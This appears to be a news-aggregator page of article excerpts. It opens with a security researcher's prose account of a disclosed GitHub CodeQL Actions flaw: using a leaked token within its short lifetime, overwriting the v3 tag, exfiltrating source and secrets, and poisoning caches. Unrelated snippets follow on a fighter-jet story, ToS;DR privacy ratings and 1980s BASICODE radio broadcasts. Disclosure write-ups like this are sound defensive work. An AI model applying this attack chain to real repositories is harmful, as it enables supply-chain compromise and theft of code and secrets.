Shelling out for file operations and downloads was key to increasing the speed, although there are probably ways to make it even faster.
Uses the GITHUB_TOKEN to make a new branch.
Use the GITHUB_TOKEN to push an empty file named poc.txt to that branch.
Makes a new tag for that commit.
If I could make a new branch, add a file, and create a tag for that commit, that would prove an attacker could use the token for nefarious purposes before it expired.
Given that the workflow artifact was only ~21MBs, I thought we had a chance. After successfully executing against a test repository, I moved on to the github/codeql-action repository.
About two hours later, a “PR Check — Debug artifacts after failure” workflow executed. The racer successfully retrieved the GITHUB_TOKEN, created the branch, pushed the file, and added the tag.
The ability to create a tag becomes very important in this attack. Keep that in mind as we go.
After confirming the GITHUB_TOKEN could be used within the short time window, we responsibly disclosed this vulnerability to GitHub.
Using the GITHUB_TOKEN, an attacker could add malicious code to any unprotected branch. A covert tactic would be to target feature branches pre-merge, smuggle in a small malicious code change, and wait for it to get merged. This would be especially effective due to how frequently the GitHub Actions bot commits to the CodeQL Actions repository.
They could also add tags that point to specific commits. For example, if they had malicious code on a branch and then added a v3 tag, anyone who manually used codeql-action…@v3 would execute the malicious code. More on this later.
Through code execution, you’d be able to compromise any GitHub Actions secret used within that job, as well as exfiltrate the source code of that repository. If their actions were executing on internal infrastructure, which is common with self-hosted GitHub runners, you’d also have code execution on their internal network or cloud environment.
The impact from this attack would have been very similar to the recent tj-actions/changed-files supply chain attack.
This impact is impressive, but it doesn’t quite live up to the claims I made in the beginning. Yes, through these paths, they could launch a supply chain attack against repos manually using the CodeQL actions. However, most organizations don’t include these actions manually. They just go into their repository settings, click “Enable CodeQL”, and go from there.
At first, I assumed that enabling CodeQL in your repository didn’t interact with the github/codeql-action repository at all.
After discussing this issue with some colleagues, I decided to investigate further. What actually happens when you enable CodeQL?
This section is key to understanding the full impact of this vulnerability. Stick with me.
To investigate, I created my own public repository, “John’s Top Secret Repo”, and enabled CodeQL.
After you enable CodeQL with the default settings, a special GitHub Actions workflow runs in your repository. This CodeQL action won’t show up in your repository workflows, but you can navigate to the workflow logs to see what it is doing.
Checks out your repository to the filesystem
Let’s take a closer look at step 3.
If this doesn’t shock you, look again. Remember that we have the ability to push tags to the github/codeql-action repository.
CodeQL, under the hood, is executing the actions in the github/codeql-action repository, using the commit referenced by the v3 tag. This tag was not immutable, and they were not using workflow pinning (which GitHub recommends), which meant that an attacker could overwrite the v3 tag using the compromised GITHUB_TOKEN. Now, if an attacker removed and then added a v3 tag to their malicious commit, every single repository using the default CodeQL workflow would execute their malicious code.
The Action created when selecting “Advanced CodeQL” also used the reusable github/codeql-action with the v3 tag.
The CodeQL actions check out the source code of every repository they run on, which means that a malicious CodeQL action could exfiltrate the source code of any repository using default CodeQL configurations.
This would result in significant disclosure of intellectual property. And if you’ve ever operated on a Red Team, you know how many hardcoded secrets are lying around in private source code repositories.
We’re almost done. But remember, I promised one more thing:
4. Compromise GitHub Actions secrets of any workflow using the GitHub Actions Cache within a repo that uses CodeQL
When assessing the impact of CI/CD attack paths, I look for ways to compromise GitHub Actions secrets. Usually, those secrets are where the crown jewels live.
If the CodeQL action is executing with write privileges or alongside GitHub Actions secrets, then it’s trivial to use the code execution to exfiltrate those secrets. But the default CodeQL action uses a GITHUB_TOKEN that only has read privileges, so you can’t perform repository write operations, backdoor releases, or use fancy workflow dispatch events to steal secrets, like what happened with PyTorch.
What the default CodeQL action does do is execute in the main branch of the repository. The main branch of any GitHub repository can write cache entries that will be used by the entire repo. This opens up an opportunity to conduct GitHub Actions cache poisoning.
GitHub Actions Cache Poisoning is thoroughly explained in this article by Adnan Khan, which documents the discovery and exploitation of cache poisoning. The easiest way to conduct GitHub Actions cache poisoning is by deploying Cacheract, malware that persists in a build pipeline through cache poisoning.
If an attacker deployed Cacheract in the CodeQL workflow, it would:
Gain code execution within any workflow that uses action-cache (the Actions Cache is used by most repositories)
Leverage code execution to compromise GitHub Actions secrets used by those workflows, capture privileged GITHUB_TOKENs, and more
Even if someone noticed the malicious CodeQL action and remediated the vulnerability, Cacheract would continue poisoning caches.
I spent ten minutes looking for prominent repos that use CodeQL & actions/cache and identified
Homebrew, Angular, and Grafana.
Cache poisoning would allow an attacker to leverage this CodeQL supply chain attack to gain write access to repositories and repository secrets.
We’ve now hit all the impact highlights I mentioned at the beginning:
Compromise intellectual property by exfiltrating the source code of all private repositories using CodeQL.
Steal credentials within GitHub Actions secrets of any workflow job using CodeQL, and leverage those secrets to execute further supply chain attacks.
Compromise GitHub Actions secrets of any workflow using the GitHub Actions Cache within a repo that uses CodeQL.
Supply chain attacks like these are scary, especially when they start with something as simple as a publicly exposed credential. If this is your first time hearing about abusing GitHub Actions to launch supply chain attacks, I’ll let you in on a secret: these vulnerabilities occur all the time.
...
Read the original on www.praetorian.com »
Skip to main content
You are the owner of this article.
You have permission to edit this article.
Cloudy skies this morning followed by scattered showers and thunderstorms during the afternoon. A few storms may be severe. High 77F. Winds SW at 10 to 20 mph. Chance of rain 40%..
Scattered thunderstorms. Potential for severe thunderstorms. Low 62F. Winds SW at 10 to 15 mph. Chance of rain 50%.
Inside a Marine’s decision to eject from a failing F-35B fighter jet and the betrayal in its wake
Tony Bartelme, senior projects reporter for The Post and Courier, has earned national honors from the Nieman, Scripps, Loeb and National Press foundations, including Columbia University’s John Chancellor Award for cumulative achievements in journalism. He has written five books and is a four-time finalist for the Pulitzer Prize. Reach Tony at tbartelme@postandcourier.com 843-425-8254
...
Read the original on www.postandcourier.com »
“I have read and agree to the Terms” is the biggest lie on the web. Together, we can fix that.
Facebook stores your data whether you have an account or not.
Deleted content is not really deleted
This service keeps user logs for an undefined period of time
Third-party cookies are used for advertising
Terms may be changed any time at their discretion, without notice to the user
This service tracks you on other websites
The service can delete your account without prior notice and without a reason
Voice data is collected and shared with third-parties
The service can delete specific content without prior notice and without a reason
This service may keep personal data after a request for erasure for business interests or legal obligations
Tracking via third-party cookies for other purposes without your consent.
The service can delete your account without prior notice and without a reason
Users have a reduced time period to take legal action against the service
The service may use tracking pixels, web beacons, browser fingerprinting, and/or device fingerprinting on users.
Your data may be processed and stored anywhere in the world
Instead of asking directly, this Service will assume your consent merely from your usage.
You can delete your account and Duck Addresses
This service provides an onion site accessible over Tor
The service makes critical changes to its terms without user involvement
Deleted videos are not really deleted
Third-party cookies are used for advertising
This service gathers information about you through third parties
Reduction of legal period for cause of action
The service can delete specific content without prior notice and without a reason
Tracking via third-party cookies for other purposes without your consent.
The service collects many different types of personal data
This service may keep personal data after a request for erasure for business interests or legal obligations
The service can delete your account without prior notice and without a reason
They store data on you even if you did not interact with the service
Tracking via third-party cookies for other purposes including advertising
This service may keep personal data after a request for erasure for business interests or legal obligations
This service tracks you on other websites
This service gathers information about you through third parties
The service can delete specific content without prior notice and without a reason
Some personal data may be kept for business interests or legal obligations
This service tracks you on other websites
The copyright license maintained by the service over user data and/or content is broader than necessary.
You can access most of the pages on the service’s website without revealing any personal information
This service still tracks you even if you opted out from tracking
The service collects many different types of personal data
This service does not track you
The service will resist legal requests for user information where reasonably possible
IP addresses of website visitors are not tracked
The cookies used by this service do not contain information that would personally identify you
The cookies used by this service do not contain information that would personally identify you
This service can share your personal information to third parties
This service tracks you on other websites
The service can delete your account without prior notice and without a reason
This service forces users into binding arbitration in the case of disputes
The service can delete specific content without prior notice and without a reason
Terms may be changed any time at their discretion, without notice to the user
The service collects many different types of personal data
This service shares your personal data with third parties that are not involved in its operation
Content you post may be edited by the service for any reason
The service can delete specific content without reason and may do it without prior notice
Terms may be changed any time at their discretion, without notice to the user
Many different types of personal data are collected
This service keeps a license on user-generated content even after users close their accounts.
ToS;DR aims to provide easy-to-understand summaries of Privacy Policies and Terms of Service through a transparent and peer-reviewed process.
Terms of service are reviewed by volunteer contributors, who highlight small points that we can discuss, compare and ultimately assign a score: “good”, “neutral”, “bad”, and scariest of all, “blocker”.
Once a service has enough points to assess the fairness of their terms, we use a formula to provide ratings from Grade A to Grade E:Grade A — The terms of service treat you fairly, respect your rights, and will not abuse your data. Grade B — The terms of service are fair towards the user but they could be improved.Grade C — The terms of service are okay but some issues need your consideration.Grade D — The terms of service are very uneven, or there are some important issues that need your attention.Grade E — The terms of service raise very serious concerns.No Grade Yet — Not enough information exists to accurately grade this service yet.
Right now you will notice that many services do not yet have a grade assigned. This is where you come in! Help us analyse more documents so that we may increase our coverage.
...
Read the original on tosdr.org »
So there I was, minding my own business, doom-scrolling my way through Facebook posts when I happened upon one that hit me straight in the nostalgia. A photo of a 1980s home computer, a cassette player and some tapes. The text underneath proclaimed “In the 1980s, people could download video games from radio broadcasts by recording the audio onto cassette tapes. These tapes could then be played on computers to load the games”. I nodded sagely to myself as I remembered doing just that.
Then I started to read the comments underneath and people were flat-out denying that this had ever happened. The reply guys broadly fell into two camps: the “I have never heard of this, therefore it never happened” and the over confident “expert” saying things like “this would be technically impossible due to some fancy sounding words I’ve heard like ‘hertz’, ‘compression’ and ‘frequency shift keying’, therefore it never happened”.
Just to make sure I was in a spluttering rage the page itself was titled “Unbelievable facts” as if my own childhood had become unbelievable. Although now I think about it it was an unbelievably long time ago, so maybe they have a point.
Anyway, come back with me to the UK in the early 1980s. Recession, strikes, unemployment and the first female Prime Minister, Margaret Thatcher, dominated the news. The home video cassette recorder was only just becoming common, the compact disc wouldn’t be launched until the middle of the decade and mobile phone networks didn’t even exist. Dexy’s Midnight Runners, Irene Cara and Culture Club soundtracked the era and, across the land, the home computer boom was booming.
Computers were new, barely making their way even into the workplace. Most people in office jobs were using typewriters, carbon papers and the postal system. But the microprocessor revolution promised to make computer skills essential to the economy and so the British Broadcasting Corporation began a public education exercise : The BBC Computer Literacy Project.
The BBC’s project is best remembered for the TV programmes fronted by Ian McNaught Davis and Chris Serle and, of course, the eponymous BBC Micro specially developed by Acorn to accompany the programmes. Less well known was a Radio 4 series called The Chip Shop. According to the ever reliable internet, it was presented by Barry Norman (much better known as a film critic than a technology expert) although I have no recollection of that.
Home computers at the time were a marvel of cost efficient engineering. Usually consisting of a chunky wedge-shaped keyboard with all the gadgetry inside, it used your normal home TV as a display and a normal portable cassette recorded as a data storage device. Software (which for most of us meant games) would be supplied on an audio cassette on which a series of piercing screeching noises were recorded. You’d hook up the cassette player to your computer, play the screeching noises into your computer through a cable of some description and after a few minutes your game would be loaded up and ready to play. Or, more often, you’d hear several minutes of screeching before the process died with a cryptic message like “R Tape Error” and you’d have to start again.
There were many different companies making these computers all competing for the nascent home market. And, with a few notable exceptions, they were all incompatible with each other and the screeching noises on cassette for, say, your ZX Spectrum would be of no use to the kid next door who had a Commodore 64. This presented a problem for Barry and his Chip Shop. The BBC wanted to broadcast software as part of the radio programme but they’d have to play a different set of screeching noises for each type of computer and their regular listeners would be subjected to twenty minutes of screeching noises at a time.
The solution lay over the water in The Netherlands. The Dutch public broadcaster NOS had encountered the same problem and had developed a system called BASICODE. Often described as a kind of “Computer Esperanto”, it allowed the same software to run on different types of computer. You would order a cassette that had BASICODE interpreters for different machines, load up the one that matched your device and then that interpreter would load up the BASICODE program you’d recorded off your radio.
The BBC extended this system as BASICODE 2 (and later 2+) to include more functionality and support more brands of computer. And so was born The Chip Shop Takeaway. Late at night when anyone with any sense was asleep and not listening to their radio, the BBC would broadcast BASICODE programs for home computer enthusiasts to record and use on their machines. To call these “video games” would be a bit of a stretch as BASICODE didn’t really support any kind of graphics but I certainly remember some very basic text-based games amongst a load of academic software which meant absolutely nothing to me as an eight year old boy.
Nothing lasts forever though. The mass of competing computer systems became an unsustainable boom market. Manufacturers went broke, the range declined, technology moved on and the boom became a bust. Newer 16 bit machines eschewed cassette storage for new-fangled disk drives and the screeching of a BASICODE takeaway became a forgotten sound on Britain’s radio waves. According to Wikipedia BASICODE 3 was also developed and continued to be popular in the old East Germany up until the early 1990s but for those of us in the UK it had already moved into the realm of “unbelievable facts”.
...
Read the original on newslttrs.com »
To add this web app to your iOS home screen tap the share button and select "Add to the Home Screen".
10HN is also available as an iOS App
If you visit 10HN only rarely, check out the the best articles from the past week.
If you like 10HN please leave feedback and share
Visit pancik.com for more.